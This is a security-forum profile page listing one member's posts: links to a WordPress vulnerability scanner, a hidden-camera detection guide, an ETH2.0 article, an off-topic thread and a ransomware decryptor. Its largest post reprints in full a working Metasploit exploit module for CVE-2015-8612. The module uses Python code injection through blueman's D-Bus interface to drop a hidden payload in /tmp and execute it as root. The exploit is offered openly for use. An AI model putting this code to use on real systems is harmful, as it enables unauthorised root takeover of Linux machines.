Jump to content

Fi8sVrs

Active Members
 View Profile  See their activity

  • Posts

    3206

  • Joined

  • Days Won

    87

 Content Type 

Posts posted by Fi8sVrs

  13. WPintel

    in Programe securitate

    Posted · Edited by OKQL

    HVD7d2JySzCfcxxj8ZkxHTo952Z55qGuoS5rKRDJ

     

    Overview
    WordPress Vulnerability Scanner - Scan for vulnerabilities, version, themes, plugins and much more!
    WPintel allows you to scan self hosted WordPress sites.

    With WPintel you can detect the following:
    • Version
    • Version vulnerabilities
    • Plugins
    • Themes
    • Users
    and much more!

    Although WPintel is designed for self hosted (wordpress.org) WordPress sites, some of it's functionalities still work for sites hosted on wordpress.com.

    DISCLAIMER: Usage of this extension without prior mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

     

    Source:

    https://chrome.google.com/webstore/detail/wpintel/mkhmkjcbidkifopffebieonhhkondlfe

    • Downvote 1

  16. How To Find Hidden Cameras & Spy Gear Like a Professional: The Definitive Guide

    in Tutoriale in engleza

    Posted

    This is without a doubt most thorough guide to detecting hidden cameras and covert spy gear that is online.

    The simple strategies that we are going to show you will effectively clear most rooms for hidden cameras and bugs without having to use super expensive countersurveillance gear or an outside company.

    Most of the processes and steps that we are going to show you are adopted from some of our best government agencies, where countersurveillance is of a grave concern to them, so these techniques have been tried and tested

    And the best part about this guide?

     

    Articol complet: https://www.senteltechsecurity.com/blog/post/how-to-find-hidden-cameras/

     

    • Downvote 1

  17. blueman - set_dhcp_handler D-Bus Privilege Escalation Exploit

    in Exploituri

    Posted 

    
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking
 
  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'blueman set_dhcp_handler D-Bus Privilege Escalation',
      'Description'    => %q{
        This module attempts to gain root privileges by exploiting a Python
        code injection vulnerability in blueman versions prior to 2.0.3.
 
        The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
        `set_dhcp_handler` function which uses user input in a call to `eval`,
        without sanitization, resulting in arbitrary code execution as root.
 
        This module has been tested successfully with blueman version 1.23
        on Debian 8 Jessie (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'the grugq', # Discovery and exploit
          'bcoles'     # Metasploit
        ],
      'DisclosureDate' => '2015-12-18',
      'References'     =>
        [
          ['BID', '79688'],
          ['CVE', '2015-8612'],
          ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'],
          ['URL', 'https://github.com/blueman-project/blueman/issues/416'],
          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'],
          ['URL', 'https://www.debian.org/security/2015/dsa-3427'],
          ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'],
          ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085']
        ],
      'Platform'       => ['linux'],
      'Arch'           =>
        [
          ARCH_X86,
          ARCH_X64,
          ARCH_ARMLE,
          ARCH_AARCH64,
          ARCH_PPC,
          ARCH_MIPSLE,
          ARCH_MIPSBE
        ],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'DefaultTarget'  => 0))
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end
 
  def base_dir
    datastore['WritableDir'].to_s
  end
 
  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end
 
  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end
 
  def dbus_send(dest:, type:, path:, interface:, contents:)
    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
  end
 
  def check
    unless command_exists? 'dbus-send'
      vprint_error 'dbus-send is not installed. Exploitation will fail.'
      return CheckCode::Safe
    end
    vprint_good 'dbus-send is installed'
 
    res = dbus_send(
      dest: 'org.blueman.Mechanism',
      type: 'method_call',
      path: '/',
      interface: 'org.freedesktop.DBus.Introspectable.Introspect',
      contents: ''
    )
 
    unless res.include? 'EnableNetwork'
      vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available'
      return CheckCode::Safe
    end
    vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
 
    res = execute_python('')
    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
      vprint_error 'Target is not vulnerable'
      return CheckCode::Safe
    end
 
    CheckCode::Vulnerable
  end
 
  def execute_python(code)
    dbus_send(
      dest: 'org.blueman.Mechanism',
      type: 'method_call',
      path: '/',
      interface: 'org.blueman.Mechanism.EnableNetwork',
      contents: "'string:[]' 'string:[]' 'string:#{code}'"
    )
  end
 
  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end
 
    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end
 
    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end
 
    payload_name = ".#{rand_text_alphanumeric 10..15}"
    payload_path = "#{base_dir}/#{payload_name}"
    upload_and_chmodx payload_path, generate_payload_exe
 
    print_status 'Executing payload...'
    res = execute_python "os.system(\"#{payload_path}&\")"
    vprint_line res
 
    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
      fail_with Failure::NotVulnerable, 'The target is not vulnerable'
    end
 
    if res.include? 'SyntaxError:'
      fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
    end
  end
end
 
#  0day.today [2019-01-17]  #
    • Upvote 1

  18. An engineer’s guide to ETH2.0

    in Cryptocurrency

    Posted

    What is ETH2.0?

    ETH2.0 is the planned replacement for Ethereum. Over the next several years, ETH2.0’s designers intend to completely subsume Ethereum’s consensus system and state altogether. With such a broad scope, we can’t say precisely what ETH2.0 will or will not include. We do have a few specs, and quite a few teams working on early implementations. At this point, the ETH2.0 designers tentatively plan to include sharding, Casper, state rent, and an eWASM VM. Initial client testing is underway, and a feature-light ETH2.0 testnet is expected to launch within three months (Q1 2019). At first, ETH2.0 will source its Ether (but not its security) from the main Ethereum chain, but designers eventually plan to invert the relationship by making ETH2.0 the main chain, and Ethereum 1.X a shard chain under its management.

     

    Articol complet: https://hackernoon.com/what-to-expect-when-eths-expecting-80cb4951afcd

    • Downvote 1

  23. Problema Netflix

    in Off-topic

    Posted · Edited by OKQL
    2-10 mayday, aici Vulturul, doborati cioara

    4 hours ago, AndrusKanu said:

    Nu stiu la ce te referi :(

    Se refera ca ti-a "ciordit" (furat) cioroi parola

     

    Edit on: scan cu antivirusi

    • Downvote 1

  24. PyLocky Decryptor

    in Programe securitate

    Posted · Edited by OKQL

    This decryptor is intended to decrypt the files for those victims affected by the ransomware PyLocky.

     

    This decryptor is built to be executed on Windows systems only and it does require a PCAP of the outbound connection attempt to the C&C servers. This connection is seen seconds after the infection occurs and it will contain, among other info, the Initialization Vector (IV) and a password (both generated randomly at runtime) used to encrypt the files. Without this PCAP containing these values, the decryption won't be possible.

    The structure of the outbound connection contains an string like: 

    PCNAME=NAME&IV=KXyiJnifKQQ%3D%0A&GC=VGA+3D&PASSWORD=CVxAfel9ojCYJ9So&CPU=Intel%28R%29+Xeon%28R%29+CPU+E5-1660+v4+%40+3.20GHz&LANG=en_US&INSERT=1&UID=XXXXXXXXXXXXXXXX&RAM=4&OSV=10.0.16299+16299&MAC=00%3A00%3A00%3A00%3A45%3A6B&OS=Microsoft+Windows+10+Pro

     

    Download: https://github.com/Cisco-Talos/pylocky_decryptor

     

    Source https://github.com/Cisco-Talos/pylocky_decryptor

    • Upvote 3
    • Downvote 1
×
×
  • Create New...